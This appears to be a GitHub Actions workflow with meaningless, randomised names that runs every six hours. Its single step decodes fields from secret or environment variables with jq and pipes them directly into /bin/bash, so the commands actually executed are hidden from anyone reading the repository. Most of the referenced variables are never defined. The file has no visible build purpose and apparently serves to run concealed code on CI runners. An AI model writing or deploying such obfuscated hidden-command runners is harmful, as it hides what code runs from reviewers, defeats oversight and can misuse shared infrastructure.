name: huarukui7615
on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huarukui7615
        env:
          z6: ${{ secrets.z6 }}
        run: |
          echo $z6 | jq -r .uc19 | /bin/bash
          echo $hhtr40 | jq -r .k35 | /bin/bash
          echo $sison25112 | jq -r .kur9008 | /bin/bash
          echo $jqhp7261 | jq -r .zh26 | /bin/bash
          echo $v5 | jq -r .mtton2 | /bin/bash
          echo $qo3448 | jq -r .ruk36 | /bin/bash
          echo $fw10 | jq -r .degh3 | /bin/bash
          echo $dfpee23 | jq -r .iwnwq5499 | /bin/bash
          echo $dj936 | jq -r .lfs71 | /bin/bash

